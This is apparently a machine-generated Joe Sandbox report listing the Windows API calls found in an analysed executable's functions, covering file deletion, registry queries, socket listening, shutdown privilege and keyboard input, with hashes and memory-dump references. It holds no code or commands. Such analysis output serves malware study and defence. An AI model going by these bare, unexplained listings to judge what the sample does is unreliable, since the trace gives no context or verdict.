                                  • Part of subcall function 00C9B8E7: GetLastError.KERNEL32(?,00C9B3CB,?,?,?), ref: 00C9B90D
                                  • Part of subcall function 00C9B8E7: GetProcessHeap.KERNEL32(00000008,?,?,00C9B3CB,?,?,?), ref: 00C9B91C
                                  • Part of subcall function 00C9B8E7: HeapAlloc.KERNEL32(00000000,?,00C9B3CB,?,?,?), ref: 00C9B923
                                  • Part of subcall function 00C9B8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00C9B93A
                                  • Part of subcall function 00C9B982: GetProcessHeap.KERNEL32(00000008,00C9B3E1,00000000,00000000,?,00C9B3E1,?), ref: 00C9B98E
                                  • Part of subcall function 00C9B982: HeapAlloc.KERNEL32(00000000,?,00C9B3E1,?), ref: 00C9B995
                                  • Part of subcall function 00C9B982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00C9B3E1,?), ref: 00C9B9A6
                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C9B3FC
                                • _memset.LIBCMT ref: 00C9B411
                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C9B430
                                • GetLengthSid.ADVAPI32(?), ref: 00C9B441
                                • GetAce.ADVAPI32(?,00000000,?), ref: 00C9B47E
                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C9B49A
                                • GetLengthSid.ADVAPI32(?), ref: 00C9B4B7
                                • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00C9B4C6
                                • HeapAlloc.KERNEL32(00000000), ref: 00C9B4CD
                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C9B4EE
                                • CopySid.ADVAPI32(00000000), ref: 00C9B4F5
                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C9B526
                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C9B54C
                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C9B560
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                • String ID:
                                • API String ID: 3996160137-0
                                • Opcode ID: 345d9aedede6bd69e57a4575f715c7f111f201a346210548b56f9ace30b18b73
                                • Instruction ID: bdc5205e38111382050f233824e450fd71ac6c653e7e5d6a087a5a0d933eec61
                                • Opcode Fuzzy Hash: 345d9aedede6bd69e57a4575f715c7f111f201a346210548b56f9ace30b18b73
                                • Instruction Fuzzy Hash: 94513C7190020ABFDF10DF94ED89AEEBB79BF04710F048159F925AA291D7319E05DB60
                                APIs
                                  • Part of subcall function 00C631B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00C631DA
                                  • Part of subcall function 00CA7C0C: GetFileAttributesW.KERNEL32(?,00CA6A7B), ref: 00CA7C0D
                                • _wcscat.LIBCMT ref: 00CA6E7E
                                • __wsplitpath.LIBCMT ref: 00CA6E99
                                • FindFirstFileW.KERNEL32(?,?), ref: 00CA6EAE
                                • _wcscpy.LIBCMT ref: 00CA6EDD
                                • _wcscat.LIBCMT ref: 00CA6EEF
                                • _wcscat.LIBCMT ref: 00CA6F01
                                • DeleteFileW.KERNEL32(?), ref: 00CA6F0E
                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00CA6F22
                                • FindClose.KERNEL32(00000000), ref: 00CA6F3D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                • String ID: \*.*
                                • API String ID: 2643075503-1173974218
                                • Opcode ID: 2e1937523ed20545ac7ca7c5e85aee86421600c15921df69c15ed0115b64eb48
                                • Instruction ID: 00ecf0aea4dee19c972c847a9f727b8d47842d84facc8cb58a389d48454307df
                                • Opcode Fuzzy Hash: 2e1937523ed20545ac7ca7c5e85aee86421600c15921df69c15ed0115b64eb48
                                • Instruction Fuzzy Hash: C821C572408385AEC710EBA0DC85ADF77DC5F5A228F084A1AF5E5C3051EA34D64D87A2
                                APIs
                                  • Part of subcall function 00CC3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CC2AA6,?,?), ref: 00CC3B0E
                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CC317F
                                  • Part of subcall function 00C684A6: __swprintf.LIBCMT ref: 00C684E5
                                  • Part of subcall function 00C684A6: __itow.LIBCMT ref: 00C68519
                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00CC321E
                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00CC32B6
                                • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00CC34F5
                                • RegCloseKey.ADVAPI32(00000000), ref: 00CC3502
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                • String ID:
                                • API String ID: 1240663315-0
                                • Opcode ID: fcdb2bf9dd0973f28835e6e43ec30552144731db8a64fea37e4c095c8f125685
                                • Instruction ID: 98cfef629afd3abba6336f7d95085667f867925dca0198e54fd05e2a256624ec
                                • Opcode Fuzzy Hash: fcdb2bf9dd0973f28835e6e43ec30552144731db8a64fea37e4c095c8f125685
                                • Instruction Fuzzy Hash: 4DE16C31204250AFCB15DF29C895E2ABBE8EF89314F04C96DF45ADB2A1DB31EE05DB51
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                • String ID:
                                • API String ID: 1737998785-0
                                • Opcode ID: f37d052e6b4ff90ae88c7d7ab478b5c5cd7658d523e42160c03e0fcdfd1674a1
                                • Instruction ID: 84dfba99d987823dba26f368d4a5ca71e4699ff54d596adfa5e6593a79f1eeab
                                • Opcode Fuzzy Hash: f37d052e6b4ff90ae88c7d7ab478b5c5cd7658d523e42160c03e0fcdfd1674a1
                                • Instruction Fuzzy Hash: F621AE31244211AFDB10AF25DC99B6D7BE8EF54720F008419FD5ADF2A1DB34ED419B94
                                APIs
                                  • Part of subcall function 00C9A857: CLSIDFromProgID.OLE32 ref: 00C9A874
                                  • Part of subcall function 00C9A857: ProgIDFromCLSID.OLE32(?,00000000), ref: 00C9A88F
                                  • Part of subcall function 00C9A857: lstrcmpiW.KERNEL32(?,00000000), ref: 00C9A89D
                                  • Part of subcall function 00C9A857: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00C9A8AD
                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00CBC6AD
                                • _memset.LIBCMT ref: 00CBC6BA
                                • _memset.LIBCMT ref: 00CBC7D8
                                • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 00CBC804
                                • CoTaskMemFree.OLE32(?), ref: 00CBC80F
                                Strings
                                • NULL Pointer assignment, xrefs: 00CBC85D
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                • String ID: NULL Pointer assignment
                                • API String ID: 1300414916-2785691316
                                • Opcode ID: 7662906a474063f73adbf3977363e61fcd6aba4a8428e8dcbbb87d9e5306ee28
                                • Instruction ID: 17b65f40d3435bea6fd2eebfaad0de43db461ceb6f8e5b60f835449acf6cb348
                                • Opcode Fuzzy Hash: 7662906a474063f73adbf3977363e61fcd6aba4a8428e8dcbbb87d9e5306ee28
                                • Instruction Fuzzy Hash: 68915C71D00228AFDB20DFA4DC85EDEBBB9EF08710F20416AF519A7291DB715A45CFA0
                                APIs
                                  • Part of subcall function 00C6CAEE: _memmove.LIBCMT ref: 00C6CB2F
                                • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00CB24F6
                                • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00CB2526
                                • _wcscmp.LIBCMT ref: 00CB253A
                                • _wcscmp.LIBCMT ref: 00CB2555
                                • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00CB25F3
                                • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00CB2609
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                • String ID: *.*
                                • API String ID: 713712311-438819550
                                • Opcode ID: dff1ab335b72a8b18d8830e5866d4e242ab004c8b038d5924a229c9eb665c838
                                • Instruction ID: baac34a5341874f660360f17284ce2c4e13e54a22b1083d653e88e13569c3033
                                • Opcode Fuzzy Hash: dff1ab335b72a8b18d8830e5866d4e242ab004c8b038d5924a229c9eb665c838
                                • Instruction Fuzzy Hash: 5541737190421AAFCF24EFA4CC99AEEBBB4FF09310F144456F425A6191E7309B95DF50
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID:
                                • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                • API String ID: 0-1546025612
                                • Opcode ID: e57aa912fdfbda2387ab1d8df151ba9e30ada02db6c5870465521ff923d50534
                                • Instruction ID: 7e3a3199f6cc3d4e902d4070a0ae9554279176c4f9ddc20bb10341911de04cfb
                                • Opcode Fuzzy Hash: e57aa912fdfbda2387ab1d8df151ba9e30ada02db6c5870465521ff923d50534
                                • Instruction Fuzzy Hash: 27927D75E0025ACBDF34CF59C8C07ADB7B5FB54314F2442AAE826AB280D7709E86DB51
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: _memmove
                                • String ID:
                                • API String ID: 4104443479-0
                                • Opcode ID: 2cfb1313bbaf4b0910727ecc251bdecf80be404f57fea1a803c2104d66841da6
                                • Instruction ID: a150029b199ef908b054a1516a9693e8ca2c6fe347f4d0bbd7bc65442f4672ce
                                • Opcode Fuzzy Hash: 2cfb1313bbaf4b0910727ecc251bdecf80be404f57fea1a803c2104d66841da6
                                • Instruction Fuzzy Hash: DF128E70A00609EFDF14DFA5C981AAEB3F5FF48300F20856AE456E7251EB35AE15DB60
                                APIs
                                  • Part of subcall function 00C9BEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C9BF0F
                                  • Part of subcall function 00C9BEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C9BF3C
                                  • Part of subcall function 00C9BEC3: GetLastError.KERNEL32 ref: 00C9BF49
                                • ExitWindowsEx.USER32(?,00000000), ref: 00CA830C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                • String ID: $@$SeShutdownPrivilege
                                • API String ID: 2234035333-194228
                                • Opcode ID: cb83bfe59653ffbcfd80bf29290a4cf0926afd3cfc0c899991edcc5fc6a3a408
                                • Instruction ID: 2e8380c3e6789db65d0bcaf95cb82fa1a2242fbe2eaee0ec7c99a96466376470
                                • Opcode Fuzzy Hash: cb83bfe59653ffbcfd80bf29290a4cf0926afd3cfc0c899991edcc5fc6a3a408
                                • Instruction Fuzzy Hash: 9101DB72752313BBFF6816789C8BBBB7658EB06F89F140424FA53D60E1DE609D0891A4
                                APIs
                                • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00CB9235
                                • WSAGetLastError.WSOCK32(00000000), ref: 00CB9244
                                • bind.WSOCK32(00000000,?,00000010), ref: 00CB9260
                                • listen.WSOCK32(00000000,00000005), ref: 00CB926F
                                • WSAGetLastError.WSOCK32(00000000), ref: 00CB9289
                                • closesocket.WSOCK32(00000000,00000000), ref: 00CB929D
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: ErrorLast$bindclosesocketlistensocket
                                • String ID:
                                • API String ID: 1279440585-0
                                • Opcode ID: 5aac97a7921940bbfcf9707654fb778c7bd3070f5712a24eba3fc20a36446dc6
                                • Instruction ID: 6f81d7350d9e2a1a2cc5975279424847371428cc88af8f7b5079bd425332624b
                                • Opcode Fuzzy Hash: 5aac97a7921940bbfcf9707654fb778c7bd3070f5712a24eba3fc20a36446dc6
                                • Instruction Fuzzy Hash: 4B218D35A00211AFCB10EF64CC85BAEB7A9EF45324F108159FA67AB391CB30AD41DB52
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00CA6F7D
                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00CA6F8D
                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 00CA6FAC
                                • __wsplitpath.LIBCMT ref: 00CA6FD0
                                • _wcscat.LIBCMT ref: 00CA6FE3
                                • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00CA7022
                                Similarity
                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                • String ID:
                                • API String ID: 1605983538-0
                                • Opcode ID: 6b111237110031af998b1f7317f5120c6505d194f7b2bcbd16d7139ec6ddc834
                                • Instruction ID: 874c13bd1adb4ae3f5a3d1fd47730d80b5d83a378bbe59313519867b2a0e31e5
                                • Instruction Fuzzy Hash: 42219271904259AFDB10ABA0CC88BEEB7BCAB09318F1004A9F505E7141E7759F84DB60
                                APIs
                                  • Part of subcall function 00C8010A: std::exception::exception.LIBCMT ref: 00C8013E
                                  • Part of subcall function 00C8010A: __CxxThrowException@8.LIBCMT ref: 00C80153
                                • _memmove.LIBCMT ref: 00CD3020
                                • _memmove.LIBCMT ref: 00CD3135
                                • _memmove.LIBCMT ref: 00CD31DC
                                Similarity
                                • API ID: _memmove$Exception@8Throwstd::exception::exception
                                • String ID:
                                • API String ID: 1300846289-0
                                • Opcode ID: 8a1151e2f66f99b97348f8166737897b0107aabb83033987a55e6f1b41fd5e2b
                                • Instruction ID: d4b013b6d0eac6f197cf14b634d07f8e9a06039645632ad08a33d5401add705e
                                • Instruction Fuzzy Hash: E302A070A00209DFDF14DF65C981AAEB7F5EF48300F14806AE80AEB355EB31DA55DB95
                                APIs
                                  • Part of subcall function 00CBACD3: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00CBACF5
                                • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00CB973D
                                • WSAGetLastError.WSOCK32(00000000,00000000), ref: 00CB9760
                                Similarity
                                • API ID: ErrorLastinet_addrsocket
                                • String ID:
                                • API String ID: 4170576061-0
                                • Opcode ID: 9f6ab270bb742378045c75324410c7f7c01037c8bd67cfbd7c301d6d5f8ce7d0
                                • Instruction ID: f624d24691e7f5dae87bd324f98f389d49c005e07b37d6082f3aa3c071de5afa
                                • Instruction Fuzzy Hash: 4841C370600210AFDB10AF38CC86E7E77EDEF44728F148158F956AB392DB74AE019B91
                                APIs
                                • FindFirstFileW.KERNEL32(?,?), ref: 00CAF37A
                                • _wcscmp.LIBCMT ref: 00CAF3AA
                                • _wcscmp.LIBCMT ref: 00CAF3BF
                                • FindNextFileW.KERNEL32(00000000,?), ref: 00CAF3D0
                                • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00CAF3FE
                                Similarity
                                • API ID: Find$File_wcscmp$CloseFirstNext
                                • String ID:
                                • API String ID: 2387731787-0
                                • Opcode ID: c5a49d3473d43b39ce0dbe988e2d74923bbe1edfb60cddf5c6707e044f581386
                                • Instruction ID: c09fedcb7fcf1fea355b933f5b2dfffbc03f6bd8fe02c4b1a02be516fb13d992
                                • Instruction Fuzzy Hash: E241BF356003029FC718DF68C4D0A9AB7E4FF4A328F10452DE96ACB3A1DB31E946DB91
                                APIs
                                • LoadLibraryA.KERNEL32(kernel32.dll,?,00CC20EC,?,00CC22E0), ref: 00CC2104
                                • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00CC2116
                                Strings
                                Similarity
                                • API ID: AddressLibraryLoadProc
                                • String ID: GetProcessId$kernel32.dll
                                • API String ID: 2574300362-399901964
                                • Opcode ID: fafd767712d3d8386f5acfe5dc2826cd2071630858aa530d3e7b2c1eed31074e
                                • Instruction ID: 213ce5c2594e54f8a0fabbd9a900ade6b8c05ea71086c7589f003ac30134a332
                                • Instruction Fuzzy Hash: 40D0A7344003529FD7205F60F84DB4E36D4AB04320B04541DE65AD1154DB70C8C0CB20
                                APIs
                                  • Part of subcall function 00C8010A: std::exception::exception.LIBCMT ref: 00C8013E
                                  • Part of subcall function 00C8010A: __CxxThrowException@8.LIBCMT ref: 00C80153
                                • _memmove.LIBCMT ref: 00C72C63
                                • _memmove.LIBCMT ref: 00C7303A
                                Strings
                                Similarity
                                • API ID: _memmove$Exception@8Throwstd::exception::exception
                                • String ID: @
                                • API String ID: 1300846289-2766056989
                                • Opcode ID: b179c5cd47f1789ea32fd99bf30a7a8a286884ad85290b498b3a757cef2ef25b
                                • Instruction ID: d23fe11f92799cedd8be5e0a3dd2e3f80302e9cc5abed72d303fc2f9a4f6330e
                                • Instruction Fuzzy Hash: ECC2AF74A00245DFCF24DF95C890AADB7B1FF48310F24805AE91AAB351DB35EE46DB91
                                APIs
                                • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00CA439C
                                • SetKeyboardState.USER32(00000080,?,00000001), ref: 00CA43B8
                                • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 00CA4425
                                • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00CA4483
                                Similarity
                                • API ID: KeyboardState$InputMessagePostSend
                                • String ID:
                                • API String ID: 432972143-0
                                • Opcode ID: d536bec05e57ed57f6f3b582912081a4f05ed31518b19b99dc362f0f26729cfd
                                • Instruction ID: 289c8f4094db1f7e347d51d3de948be8d0f40332f823f70ca9e8679c2ed02bf1
                                • Instruction Fuzzy Hash: D44129B090034AAAEF288B6598497FD7BB5ABCA319F04011AF591972C1C7F8CE85D761
                                APIs
                                • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00CA221E
                                Strings
                                Similarity
                                • API ID: lstrlen
                                • String ID: ($|
                                • API String ID: 1659193697-1631851259
                                • Opcode ID: 218f629de4f801754d4a16a0ab7faba31c0935af2f4b2c29f054003f928dda3c
                                • Instruction ID: 854638e6dbdb12165153a79769eb33ac5189c8ad09c8e4309e13c657c52c4c48
                                • Instruction Fuzzy Hash: 8E322675A006169FCB28DF69C480A6AF7F0FF49324B11C56EE4AADB3A1D770E941CB44
                                APIs
                                  • Part of subcall function 00C7AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00C7AF8E
                                • DefDlgProcW.USER32(?,?,?,?,?), ref: 00C7AE5E
                                Similarity
                                • API ID: LongProcWindow
                                • String ID:
                                • API String ID: 3265722593-0
                                • Opcode ID: b7ad0d8a333734037812958e16d51373786f7ce8b38de21207adf945e3416afe
                                • Instruction ID: ca2ba01f45cc3777babc759790d50b8748638582a6d9ae345ef7cffe61dbfaf0
                                • Instruction Fuzzy Hash: 98A12B64104204BADB38AB3A8C88E7F395DFBD5741B11C52EF51BD62B1CA158E12A273
                                APIs
                                • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00CB4A1E,00000000), ref: 00CB55FD
                                • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00CB5629
                                Similarity
                                • API ID: Internet$AvailableDataFileQueryRead
                                • String ID:
                                • API String ID: 599397726-0
                                • Opcode ID: b4f0b4166245e09d18dc234467ee96eb61fb1c92ef0773c4a87f755b9226a170
                                • Instruction ID: c9c4963b61514ff1f0068e4beedbeb639eb030b7902ec2b55e68ef59a934ec9e
                                • Instruction Fuzzy Hash: 4941D371900A09BFEB209F91DC85FFFB7BDEB40729F10401AF615A6280DA719F45AB64
                                APIs
                                • SetErrorMode.KERNEL32(00000001), ref: 00CAEA95
                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00CAEAEF
                                • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00CAEB3C
                                Similarity
                                • API ID: ErrorMode$DiskFreeSpace
                                • String ID:
                                • API String ID: 1682464887-0
                                • Opcode ID: c55d3dabaf8ec49ff303a5215d460e88b96bcd6a40507ee23caf5890c26dd0e3
                                • Instruction ID: 0bf8050d95222d27811bccc8f5f5ee70baf158b43242e87c5e7d2a319b82c82c
                                • Instruction Fuzzy Hash: C7216D35A00219EFCB00DFA5D894AEEBBB8FF49324F1480A9E946EB351DB31D905DB50
                                APIs
                                • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00CA70D8
                                • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,0000000C,?,00000000), ref: 00CA7115
                                • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00CA711E
                                Similarity
                                • API ID: CloseControlCreateDeviceFileHandle
                                • String ID:
                                • API String ID: 33631002-0
                                • Opcode ID: 4adc3da210e5de31c142cb40c427fbe67dbf21668306079ed02345a63c6eafb9
                                • Instruction ID: 018725042b252f5bb8fdc0c1c94c7206a939b36cad1361bc48cabb085f0ac87a
                                • Instruction Fuzzy Hash: 8C11A5B1900229BEE7108BA8DC45FAF77FCEB09714F004655BA15EB190D2749E0487E1
                                APIs
                                Similarity
                                • API ID: _memmove
                                • String ID:
                                • API String ID: 4104443479-0
                                • Opcode ID: eea032f12a9ec61bb2e27d9974dfcd60633f5c2f0c697be4a7efc347d399853f
                                • Instruction ID: e84ebfb322b4d98573ffc694a99625a9ea91e0128103923693baa5dd3a4b019f
                                • Instruction Fuzzy Hash: 80A24B75D00259CFCB24CF99C4806ADBBB1FF48314F2581AAE869AB391D7749E81DF90
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d2bdace5d607ea8ac1e2cb203b98a7eed2d79cac29bc56fb5183356cd32b6822
                                • Instruction ID: f4382e8757f94695717c61861d9e0653b377b0d10b0cf1949d5486380a2498ed
                                • Instruction Fuzzy Hash: DD229E74E00206DFDB24DF58C490AAEB7F0FF19310F14806AE9579B391E771AA85DB92
                                APIs
                                • FindFirstFileW.KERNEL32(?,?), ref: 00CAFD71
                                • FindClose.KERNEL32(00000000), ref: 00CAFDA1
                                Similarity
                                • API ID: Find$CloseFileFirst
                                • String ID:
                                • API String ID: 2295610775-0
                                • Opcode ID: 8f83748dbf6685b728a3dd7a062099494659f82f8ad07e32e8715e0fa3c50225
